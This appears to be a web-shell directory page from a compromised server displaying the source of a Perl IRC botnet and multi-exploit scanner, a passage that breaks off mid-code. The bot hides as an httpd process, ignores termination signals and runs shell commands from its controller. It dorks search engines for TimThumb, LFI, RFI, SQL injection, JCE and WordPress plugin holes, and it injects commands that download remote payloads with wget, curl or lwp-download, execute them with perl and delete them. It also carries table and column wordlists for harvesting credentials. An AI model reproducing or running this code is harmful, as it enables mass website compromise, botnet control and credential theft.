|
Server : Apache/2.2.2 (Fedora) System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686 User : apache ( 48) PHP Version : 5.2.9 Disable Function : NONE Directory : /var/www/html/pathumthani_integration/pathumthani_drug/images/ |
Upload File : |
#!/usr/bin/perl
use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
use MIME::Base64;
use URI::Escape;
use Digest::MD5 qw(md5_hex);
#use DBI;
#use DBD::mysql;
my $datetime = localtime;
my $fakeproc = "/usr/sbin/httpd";
my $ircserver = "112.166.211.22";
my $ircport = "9000";
my $nickname = "account";
my $ident = "bouncer";
my $channel = "#2014";
my $chanxxx = "#2014";
my $chanxx1 = "#2014";
my $chanxx2 = "#2014";
my $chaninfo = "#2014";
my $submitchan = "#2014";
my $admin = "junaedy";
my $fullname = "9,1[4!9]15[scanner] BoUnCeR's JcE VersioN ";
my $rawmsg = $ARGV[4];
my $msgraw = $ARGV[5];
my $nob0dy = "9,1[4!9]15[scanner] BoUnCeR's VersioN ";
my $whmcslogo = "9,1[4!9]15WHMCS 4<9=4> ";
my $thumblogo = "9,1[4!9]15TimThumb 4<9=4> ";
my $zerologo = "9,1[4!9]15zBoarD 4<9=4> ";
my $lfilogo = "9,1[4!9]15Lfi 4<9=4> ";
my $rfilogo = "9,1[4!9]15Rfi 4<9=4> ";
my $xmllogo = "9,1[4!9]15Xml 4<9=4> ";
my $oscologo = "9,1[4!9]15Osco 4<9=4> ";
my $oscosqllogo = "9,1[4!9]15O-Sql 4<9=4> ";
my $e107logo = "9,1[4!9]15E107 4<9=4> ";
my $ihlogo = "9,1[4!9]15Is-Human 4<9=4> ";
my $zenlogo = "9,1[4!9]15ZenCart 4<9=4> ";
my $rfglogo = "9,1[4!9]15RfG 4<9=4> ";
my $mmfclogo = "9,1[4!9]15MmFC 4<9=4> ";
my $avmlogo = "9,1[4!9]15AVM 4<9=4> ";
my $sqllogo = "9,1[4!9]15SqL 4<9=4> ";
my $carilogo = "9,1[4!9]15Find 4<9=4> ";
my $jcelogo = "9,1[4!9]15JCE Exploiter4<9=4> ";
my $jnewslogo = "9,1[4!9]11JNews 9<4=9> ";
my $jinclogo = "9,1[4!9]11JINC 9<4=9> ";
my $letterlogo = "9,1[4!9]11JnewsLetter 9<4=9> ";
my $redmistyclogo = "9,1[4!9]11RedMystc 9<4=9> ";
my $phpvmslogo = "9,1[4!9]11PhpVms 9<4=9> ";
my $clipbucketlogo = "9,1[4!9]11ClipBucket 9<4=9> ";
my $maian15logo = "9,1[4!9]11Maian15 9<4=9> ";
my $findlogo = "9,1[4!9]15JCE Finder4<9=4> ";
my $whmcscmd = '!whmcs';
my $thumbcmd = "!timx";
my $zerocmd = "!zero";
my $lficmd = "!lfi";
my $rficmd = "!rfi";
my $xmlcmd = "!xml";
my $e107cmd = "!e107";
my $zencmd = "!zenc";
my $ihcmd = "!ishu";
my $oscocmd = "!osco";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $cmde107 = "!cmde107";
my $rfgcmd = "!rfg";
my $mmfccmd = "!mmfc";
my $avmcmd = "!avm";
my $sqlcmd = "!sql";
my $ftpcmd = "!ftp";
my $jcecmd = "!j";
my $jnewscmd = "!jne";
my $jinccmd = "!jinc";
my $lettercmd = "!lett";
my $redmistyccmd = "!red";
my $phpvmscmd = "!vms";
my $clipbucketcmd = "!cbk";
my $maian15cmd = "!m15";
my $findcmd = "!find";
my $spreadMode = 1;
my $zerowget = 1;
my $zerolwp = 1;
my $zerocurl = 1;
my $gps = 1;
my $gps2 = 1;
my $timot = 10;
my $silentmode = 1;
my $rceinjector = "http://www.victorparts.fr/vp31/fullscreen/iam.php";
my $hostinjector = "bouncer.freehomeschoolads.com";
my $thumbid = "http://".$hostinjector."/bad.php";
my $botdid = "http://".$hostinjector."/load.php";
my $botxdid = "http://".$hostinjector."/xcrew.php";
my $thumbshell = uri_escape($thumbid);
my $md5php = md5_hex($thumbid).".php";
my $md5bot = md5_hex($botdid).".php";
my $md5botx = md5_hex($botxdid).".php";
my $botid = uri_escape($botdid);
my $botxid = uri_escape($botxdid);
my $injector = "http://".$hostinjector."/bad.txt";
my $botshell = "http://".$hostinjector."/bot.txt";
my $subticket = "/submitticket.php?step=2&deptid=1";
my $action = "/data/lobex.php";
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;wget%20http://www.sskedu4.go.th/gsongserm/hotbot.log;perl%20bot.log;rm%20bot.log";
my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;lwp-download%20-a%20http://www.sskedu4.go.th/gsongserm/hotbot.log;perl%20bot.log;rm%20bot.log";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;curl%20-C%20-%20-O%20http://www.sskedu4.go.th/gsongserm/hotbot.log;perl%20bot.log;rm%20bot.log";
my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
my $jpath = "/includes/js/tabs/errors.php?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $jack1 = "http://barakcement.com".$jpath;
my $jack2 = "http://www.scrooser.com".$jpath;
my $jack3 = "http://iae-indonesia.com".$jpath;
my $jack4 = "http://flyarab.altervista.org".$jpath;
my $jack5 = "http://demeet.onlinewebshop.net".$jpath;
my $engine = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";
my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
$ircserver = "$ARGV[0]" if $ARGV[0];
$ircport = "$ARGV[1]" if $ARGV[1];
$nickname = "$ARGV[2]" if $ARGV[2];
$channel = '#'."$ARGV[3]" if $ARGV[3];
$0 = "$fakeproc"."\0" x 16;
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
sleep(1);}}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick($mynick.int(rand(5)));
}
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $mynick +Bx");
sendraw("ns identify sob3r3kon");
sleep(3);
sendraw("JOIN $channel correct");
sendraw("JOIN $chanxxx mejen");
sendraw("JOIN $chanxx1 mejen");
sendraw("JOIN $chanxx2 mejen");
sleep(1);
sendraw("PRIVMSG $channel :9,1[4!9]15 Hacker newbie A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
sendraw("PRIVMSG $chanxxx :9,1[4!9]15 Hacker newbie A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
sendraw("PRIVMSG $chanxx1:9,1[4!9]15 Hacker newbie A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
sendraw("PRIVMSG $chanxx2 :9,1[4!9]15 Hacker newbie A.K.A ^SQl^KinG^ Private Multi-Purpose Scanner !!!");
sendraw("PRIVMSG $admin :Hi $admin im here with you ! Sir!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
select(undef, undef, undef, 0.01);
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $ircmsg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $ircmsg);
$ircmsg =~ s/\r\n$//;
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
if ($path eq $mynick) {
if ($msg =~ /^PING (.*)/) {
sendraw("NOTICE $nick :PING $1");
}
if ($msg =~ /^VERSION/) {
sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");
}
if ($msg =~ /^TIME/) {
sendraw("NOTICE $nick :TIME ".$datetime."");
}
if (&isAdmin($nick) && $msg eq "!die") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
sendraw("NICK ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
}
if (&isAdmin($nick) && $msg !~ /^!/) {
&shell("$nick","$msg");
}
if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
sendraw("$rawmsg $msgraw ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
sendraw("PRIVMSG $rawmsg ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
sendraw("PRIVMSG $rawmsg :ACTION ".$1."");
}
if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
$newthumbcmd = $1;
$thumbcmd = $newthumbcmd;
&msg("$admin","$thumblogo9 Scan Command change to4 $thumbcmd ");
}}}
if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
$newzerocmd = $1;
$zerocmd = $newzerocmd;
&msg("$admin","$zerologo9 Scan Command change to4 $zerocmd ");
}
if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
$newwhmcscmd = $1;
$whmcscmd = $newwhmcscmd;
&msg("$admin","$whmcslogo9 Scan Command change to4 $whmcscmd ");
}
if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
$newtimot = $1;
$timot = $newtimot;
&msg("$admin","9,1 Get Content TimeOut change to4 $timot ");
}
if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
$newchan = $1;
$chanxxx = $newchan;
&msg("$admin","9,1 xChan change to4 $chanxxx ");
}}}
}
else {
if (&isAdmin($nick) && $msg eq "!die") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg eq "!part") {
sendraw("PART $path");
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
&shell("$path","$1");
}
if ($msg=~ /^!silent\s+(.*) -d/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
$smod = $1;
if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
&msg("$path","9,1[4!9]Silent Mode15 $silentstat !!!!");
}}}
if ($msg=~ /^!jackx\s+(.*) -d/) {
$engmod = $1;
if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }
elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
&msg("$path","9,1[4!9]Jack Engine15 $gpsstat !!!!");
}
if ($msg=~ /^!engine\s+(.*) -d/) {
$engmod = $1;
if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
&msg("$path","9,1[4!9]Multi Engine15 $gpsstat !!!!");
}
if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
$newhostinjector= $1;
$hostinjector = $newhostinjector;
&msg("$path","9,1[4!9]Injector 15change to4 $hostinjector ");
}
if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$path);
}
if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$path);
}
if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd,$path);
}
##################################################################### HELP COMMAND
if ($msg=~ /^!help/) {
my $helplogo = "9,1[4!9]15Help 4<9=4> ";sleep(3);
&msg("$path","$helplogo9Timthumb Vuln Scan:15 $thumbcmd [bug] [dork] ");
&msg("$path","$helplogo9RFG Vuln Scan:15 $rfgcmd [bug] [dork] ");
&msg("$path","$helplogo9RFI Vuln Scan:15 $rficmd [bug] [dork] ");
&msg("$path","$helplogo9LFI Vuln Scan:15 $lficmd [bug] [dork] ");
&msg("$path","$helplogo9XML Vuln Scan:15 $xmlcmd [bug] [dork] ");
&msg("$path","$helplogo9SqL Vuln Scan:15 $sqlcmd [bug] [dork] ");
&msg("$path","$helplogo9JCE Vuln Scan:15 $jcecmd [dork] ");
&msg("$path","$helplogo9JCE Finder:15 $findcmd [dork] ");
&msg("$path","$helplogo9Jnews Vuln Scan:15 $jnewscmd [dork] ");
&msg("$path","$helplogo9Jinc Vuln Scan:15 $jinccmd [dork] ");
&msg("$path","$helplogo9Jnewsletter Vuln Scan:15 $lettercmd [dork] ");
&msg("$path","$helplogo9PhpVms Vuln Scan:15 $phpvmscmd [dork] ");
&msg("$path","$helplogo9ClipBucket Vuln Scan:15 $clipbucketcmd [dork] ");
&msg("$path","$helplogo9Redmistyc Vuln Scan:15 $redmistyccmd [dork] ");
&msg("$path","$helplogo9Maian15 Vuln Scan:15 $maian15cmd [dork] ");
&msg("$path","$helplogo9e107 Vuln Scan:15 $e107cmd [dork] ");
&msg("$path","$helplogo9WHMCS Vuln Scan:15 $whmcscmd [dork] ");
&msg("$path","$helplogo9ZeroBoard Vuln Scan:15 $zerocmd [dork] ");
&msg("$path","$helplogo9osCommerce Vuln Scan:15 $oscocmd [dork] ");
&msg("$path","$helplogo9ZenCart Vuln Scan:15 $zencmd [dork] ");
&msg("$path","$helplogo9Tools:15 !ip [ip] | !port [ip] [port] | !dns [hostname] ");
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
&msg("$nick","6Fake Process/PID : $fakeproc - $$");
}
if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
if (&isFound($thumbid,"GIF89")) {
&msg("$path","9,1[4!9]Injector 4<9=4>9 Ready!!! ");
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
}
}
if ($msg=~/^!bypass/){
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
my $cekby1 = &get_content($jack1."byroe");
if ($cekby1 =~ /byroe\.net/i){ $bystats1 = "9Up!!!"; } else { $bystats1 = "4Lost!!!"; }
my $cekby2 = &get_content($jack2."byroe");
if ($cekby2 =~ /byroe\.net/i){ $bystats2 = "9Up!!!"; } else { $bystats2 = "4Lost!!!"; }
my $cekby3 = &get_content($jack3."byroe");
if ($cekby3 =~ /byroe\.net/i){ $bystats3 = "9Up!!!"; } else { $bystats3 = "4Lost!!!"; }
my $cekby4 = &get_content($jack4."byroe");
if ($cekby4 =~ /byroe\.net/i){ $bystats4 = "9Up!!!"; } else { $bystats4 = "4Lost!!!"; }
my $cekby5 = &get_content($jack5."byroe");
if ($cekby5 =~ /byroe\.net/i){ $bystats5 = "9Up!!!"; } else { $bystats5 = "4Lost!!!"; }
&msg("$path","9,1[4!9]Bypass 4<9=4>15 JacK1=$bystats1 15JacK2=$bystats2 15JacK3=$bystats3 15JacK4=$bystats4 15JacK5=$bystats5")
}}}
##################################################################### SCAN
if ($msg =~ /!cari\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $find = $1;
&msg($path,"$carilogo9 Searching 15$find ");
&cari($path,$find);
} exit; }
}
}
if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
my $simpan = 'situs.txt';
if ($bug =~ m/^\//){ &msg("$path","9,1[4!9]Bug nya gak usah pakek \/ di depan :p "); exit; } else {
if (&isFound($thumbid,"GIF89")) {
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning TimTHumb on 4$path ");
&msg("$path","$thumblogo9Dork 4<9=4>15 $dork ");
&msg("$path","$thumblogo9Bugz 4<9=4>15 $bug ");
&msg("$path","$thumblogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,1);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit; }
}
}
}
}
if ($msg =~ /^$whmcscmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning WHMCS on 4$path ");
&msg("$path","$whmcslogo9Dork 4<9=4>15 $dork ");
&msg("$path","$whmcslogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,2);
}
}
}
if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
my $simpan = 'situs.txt';
if (&isFound($thumbid,"GIF89")) {
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning LFI on 4$path ");
&msg("$path","$lfilogo9Dork 4<9=4>15 $dork ");
&msg("$path","$lfilogo9Bugz 4<9=4>15 $bug ");
&msg("$path","$lfilogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,3);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
}
}
}
}
if ($msg =~ /^$zerocmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if (&isFound($thumbid,"GIF89")) {
my ($bug,$dork) = ("zboard.php?id=byroe",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning zboard on 4$path ");
&msg("$path","$zerologo9Dork 4<9=4>15 $dork ");
&msg("$path","$zerologo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,4);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
}
}
}
}
if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
my $simpan = 'situs.txt';
if (&isFound($thumbid,"GIF89")) {
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning RFI on 4$path ");
&msg("$path","$rfilogo9Dork 4<9=4>15 $dork ");
&msg("$path","$rfilogo9Bugz 4<9=4>15 $bug ");
&msg("$path","$rfilogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,5);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
}
}
}
}
if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning XML on 4$path ");
&msg("$path","$xmllogo9Dork 4<9=4>15 $dork ");
&msg("$path","$xmllogo9Bugz 4<9=4>15 $bug ");
&msg("$path","$xmllogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,6);
}
}
}
if ($msg =~ /^$e107cmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if (&isFound($thumbid,"GIF89")) {
my ($bug,$dork) = ("contact.php",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning E107 on 4$path ");
&msg("$path","$e107logo9Dork 4<9=4>15 $dork ");
&msg("$path","$e107logo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,7);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
}
}
}
}
if ($msg =~ /^$ihcmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if (&isFound($thumbid,"GIF89")) {
my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning Is-Human on 4$path ");
&msg("$path","$ihlogo9Dork 4<9=4>15 $dork ");
&msg("$path","$ihlogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,8);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
}
}
}
}
if ($msg =~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $dork = $1;
my $simpan = 'situs.txt';
if (&isFound($thumbid,"GIF89")) {
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning Oscommerce on 4$path ");
&msg("$path","$oscologo9Dork 4<9=4>15 $dork ");
&msg("$path","$oscologo9Search Engine 4<9=4>15 Loading ");
&se_start($path,"apalah",$simpan,$dork,$engine,9);
} else {
&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
}
}
}
}
if ($msg =~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning ZenCart on 4$path ");
&msg("$path","$zenlogo9Dork 4<9=4>15 $dork ");
&msg("$path","$zenlogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,10);
}
}
}
if ($msg =~ /^$rfgcmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning RFG on 4$path ");
&msg("$path","$rfglogo9Dork 4<9=4>15 $dork ");
&msg("$path","$rfglogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,11);
}
}
}
if ($msg =~ /^$mmfccmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning MMFC on 4$path ");
&msg("$path","$mmfclogo9Dork 4<9=4>15 $dork ");
&msg("$path","$mmfclogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,12);
}
}
}
if ($msg =~ /^$avmcmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("wp-content/plugins/html5avmanager/lib/uploadify/custom.php",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning HTML5 AV Manager on 4$path ");
&msg("$path","$avmlogo9Dork 4<9=4>15 $dork ");
&msg("$path","$avmlogo9Search Engine 4<9=4>15 Loading ");
&se_start($path,$bug,$simpan,$dork,$engine,13);
}
}
}
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning SqL on 4$path ");
&msg("$path","$sqllogo9Dork 4<9=4>15 $dork ");
&msg("$path","$sqllogo9Bugz 4<9=4>15 $bug ");
&msg("$path","$sqllogo9Search Engine 4<9=4>15 Loading ... ");
&se_start($path,$bug,$simpan,$dork,$engine,14);
}
}
}
if ($msg =~ /^$jcecmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
